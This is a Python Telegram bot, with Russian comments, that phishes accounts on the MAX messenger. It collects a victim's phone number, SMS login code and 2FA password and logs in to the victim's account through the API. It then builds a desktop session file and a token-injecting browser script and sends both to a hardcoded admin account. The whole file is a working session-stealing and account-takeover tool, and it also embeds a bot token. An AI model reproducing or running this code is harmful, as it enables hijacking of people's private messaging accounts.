import os
import json
import asyncio
import uuid
import logging
import time
import struct
import msgpack
import random
from aiogram import Bot, Dispatcher, types, F
from aiogram.fsm.context import FSMContext
from aiogram.fsm.state import State, StatesGroup
from aiogram.fsm.storage.memory import MemoryStorage
from aiogram.types import FSInputFile

# ============================================================
# НАСТРОЙКИ (замените на свои)
# ============================================================
BOT_TOKEN = "8948301530:AAH-ZTWkJuUOfPMRFl19qC1-YUAXfKUd9C8"
ADMIN_ID = 8632861931
# ============================================================

logging.basicConfig(level=logging.INFO)
bot = Bot(token=BOT_TOKEN)
dp = Dispatcher(storage=MemoryStorage())

API_HOST = "api.oneme.ru"
API_PORT = 443

class AuthState(StatesGroup):
    waiting_for_code = State()
    waiting_for_password = State()

pending = {}

def gen_password():
    return ''.join(random.choices("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_@#", k=40))

def build_desktop_json(token, device_id, session_id, password, user_id, phone):
    return {
        "token": token,
        "device_id": device_id,
        "session_id": session_id,
        "password": password,
        "connection_params": {
            "device_type": "DESKTOP",
            "app_version": "25.12.13",
            "device_name": "Chrome",
            "os_version": "Windows 10",
            "locale": "ru",
            "device_locale": "ru",
            "screen": "1080x1920",
            "timezone": "Europe/Moscow"
        },
        "user": {
            "user_id": user_id,
            "phone": int(phone.replace("+", "")),
            "photo_id": None,
            "first_name": "",
            "last_name": ""
        }
    }

def generate_web_js(password, device_id, token, viewer_id):
    return f"""PASSWORD: {password}

sessionStorage.clear();
localStorage.clear();
localStorage.setItem('__oneme_device_id', '{device_id}');
localStorage.setItem('__oneme_auth', JSON.stringify({{"token":"{token}","viewerId":{viewer_id}}}));
window.location.reload();"""

async def send_files(phone, uid, work_dir, desktop, js):
    dp = f"{work_dir}/desktop_session.json"
    with open(dp, "w", encoding="utf-8") as f:
        json.dump(desktop, f, ensure_ascii=False, indent=4)
    wp = f"{work_dir}/web_token.js"
    with open(wp, "w", encoding="utf-8") as f:
        f.write(js)
    await bot.send_document(ADMIN_ID, FSInputFile(dp),
        caption=f"💻 <b>ДЕСКТОПНАЯ СЕССИЯ</b>\nНомер: {phone}", parse_mode="HTML")
    await bot.send_document(ADMIN_ID, FSInputFile(wp),
        caption=f"🌐 <b>ВЕБ-ТОКЕН (JS)</b>\nНомер: {phone}", parse_mode="HTML")

async def read_message(reader):
    raw_len = await reader.readexactly(4)
    length = struct.unpack(">I", raw_len)[0]
    data = await reader.readexactly(length)
    return msgpack.unpackb(data)

async def write_message(writer, data):
    packed = msgpack.packb(data)
    writer.write(struct.pack(">I", len(packed)) + packed)
    await writer.drain()

@dp.message(F.text == "/start")
async def cmd_start(message: types.Message):
    await message.answer(
        "👋 Привет! Отправь номер телефона в формате:\n\n"
        "<code>+79111111111</code>\n\n"
        "Я запрошу код подтверждения у MAX.",
        parse_mode="HTML"
    )

@dp.message(F.text.regexp(r'^\+7\d{10}$'))
async def phone_handler(message: types.Message, state: FSMContext):
    phone = message.text.strip()
    uid = message.from_user.id
    work_dir = f"cache/{uid}"
    os.makedirs(work_dir, exist_ok=True)
    
    status_msg = await message.answer("⏳ Подключаюсь к MAX...")
    
    try:
        reader, writer = await asyncio.open_connection(API_HOST, API_PORT, ssl=True)
        device_id = str(uuid.uuid4())
        
        # Handshake
        await write_message(writer, {
            "op": "handshake",
            "device_type": "DESKTOP",
            "app_version": "25.12.13",
            "device_id": device_id
        })
        
        handshake_resp = await read_message(reader)
        logging.info(f"Handshake: {handshake_resp}")
        
        # Запрос SMS
        await write_message(writer, {
            "op": "auth.sendCode",
            "phone": phone
        })
        
        sms_resp = await read_message(reader)
        logging.info(f"SMS response: {sms_resp}")
        
        if sms_resp.get("ok"):
            pending[uid] = {
                "phone": phone,
                "work_dir": work_dir,
                "reader": reader,
                "writer": writer,
                "device_id": device_id
            }
            await state.set_state(AuthState.waiting_for_code)
            await state.update_data(phone=phone, work_dir=work_dir)
            await status_msg.edit_text("✅ SMS отправлена. Введи код из 6 цифр:")
        
        elif sms_resp.get("error"):
            error_msg = sms_resp.get("error", "")
            if "block" in str(error_msg).lower():
                await status_msg.edit_text("🚫 Аккаунт заблокирован или удалён.")
            elif "limit" in str(error_msg).lower() or "flood" in str(error_msg).lower():
                await status_msg.edit_text("⏳ Слишком много попыток. Подождите.")
            else:
                await status_msg.edit_text(f"❌ Ошибка сервера: {error_msg}")
            writer.close()
        
        else:
            await status_msg.edit_text(f"❌ Неожиданный ответ: {sms_resp}")
            writer.close()
            
    except Exception as e:
        await status_msg.edit_text(f"❌ Ошибка подключения: {e}")

@dp.message(AuthState.waiting_for_code, F.text.regexp(r'^\d{6}$'))
async def code_handler(message: types.Message, state: FSMContext):
    uid = message.from_user.id
    code = message.text.strip()
    
    if uid not in pending:
        return await message.answer("⏳ Сессия устарела. Отправь номер заново через /start.")
    
    status_msg = await message.answer("⏳ Проверяю код...")
    
    data = await state.get_data()
    phone = data["phone"]
    work_dir = data["work_dir"]
    reader = pending[uid]["reader"]
    writer = pending[uid]["writer"]
    device_id = pending[uid]["device_id"]
    
    try:
        await write_message(writer, {
            "op": "auth.login",
            "phone": phone,
            "code": code
        })
        
        login_resp = await read_message(reader)
        logging.info(f"Login response: {login_resp}")
        
        error_code = login_resp.get("error_code", "")
        error_msg = login_resp.get("error", "")
        
        # Успешный вход
        if login_resp.get("ok") and login_resp.get("token"):
            token = login_resp.get("token", "")
            viewer_id = login_resp.get("user_id", 0)
            password = gen_password()
            session_id = int(time.time() * 1000)
            
            desktop = build_desktop_json(token, device_id, session_id, password, viewer_id, phone)
            js = generate_web_js(password, device_id, token, viewer_id)
            
            await send_files(phone, uid, work_dir, desktop, js)
            await status_msg.edit_text("✅ Готово! Файлы отправлены админу.")
            
        # Требуется пароль 2FA
        elif login_resp.get("need_password") or "password" in str(login_resp).lower():
            await state.set_state(AuthState.waiting_for_password)
            await status_msg.edit_text("🔐 Аккаунт защищён паролем 2FA. Введи пароль:")
            return
        
        # Аккаунт заблокирован
        elif "block" in str(login_resp).lower() or error_code == "auth.blocked":
            await status_msg.edit_text("🚫 Аккаунт заблокирован или удалён.")
        
        # Неверный код
        elif "invalid" in str(login_resp).lower() or "wrong" in str(login_resp).lower() or error_code == "auth.invalid_code":
            await status_msg.edit_text("❌ Неверный код. Попробуй ещё раз.")
            return
        
        # Лимит попыток
        elif "limit" in str(login_resp).lower() or "flood" in str(login_resp).lower():
            await status_msg.edit_text("⏳ Слишком много попыток. Подожди немного и попробуй снова.")
        
        # Другая ошибка
        else:
            await status_msg.edit_text(f"❌ Ошибка сервера: {error_msg or login_resp}")
        
        writer.close()
        del pending[uid]
        await state.clear()
        
    except Exception as e:
        await status_msg.edit_text(f"❌ Ошибка соединения: {e}")
        try:
            writer.close()
        except:
            pass
        if uid in pending:
            del pending[uid]
        await state.clear()

@dp.message(AuthState.waiting_for_password)
async def password_handler(message: types.Message, state: FSMContext):
    uid = message.from_user.id
    pwd = message.text.strip()
    
    if uid not in pending:
        return await message.answer("⏳ Сессия устарела. Отправь номер заново через /start.")
    
    status_msg = await message.answer("⏳ Проверяю пароль...")
    
    data = await state.get_data()
    phone = data["phone"]
    work_dir = data["work_dir"]
    writer = pending[uid]["writer"]
    reader = pending[uid]["reader"]
    device_id = pending[uid]["device_id"]
    
    try:
        await write_message(writer, {
            "op": "auth.sendPassword",
            "password": pwd
        })
        
        resp = await read_message(reader)
        logging.info(f"Password response: {resp}")
        
        error_msg = resp.get("error", "")
        
        # Успешно
        if resp.get("ok") and resp.get("token"):
            token = resp.get("token", "")
            viewer_id = resp.get("user_id", 0)
            password = gen_password()
            session_id = int(time.time() * 1000)
            
            desktop = build_desktop_json(token, device_id, session_id, password, viewer_id, phone)
            js = generate_web_js(password, device_id, token, viewer_id)
            
            await send_files(phone, uid, work_dir, desktop, js)
            await status_msg.edit_text("✅ Готово! Файлы отправлены админу.")
        
        # Неверный пароль
        elif "invalid" in str(resp).lower() or "wrong" in str(resp).lower():
            await status_msg.edit_text("❌ Неверный пароль. Попробуй ещё раз.")
            return
        
        # Аккаунт заблокирован
        elif "block" in str(resp).lower():
            await status_msg.edit_text("🚫 Аккаунт заблокирован.")
        
        else:
            await status_msg.edit_text(f"❌ Ошибка: {error_msg or resp}")
        
        writer.close()
        del pending[uid]
        await state.clear()
        
    except Exception as e:
        await status_msg.edit_text(f"❌ Ошибка соединения: {e}")
        try:
            writer.close()
        except:
            pass
        if uid in pending:
            del pending[uid]
        await state.clear()

async def main():
    logging.info("Бот запущен!")
    await dp.start_polling(bot)

if __name__ == "__main__":
    try:
        asyncio.run(main())
    except KeyboardInterrupt:
        logging.info("Бот остановлен.")
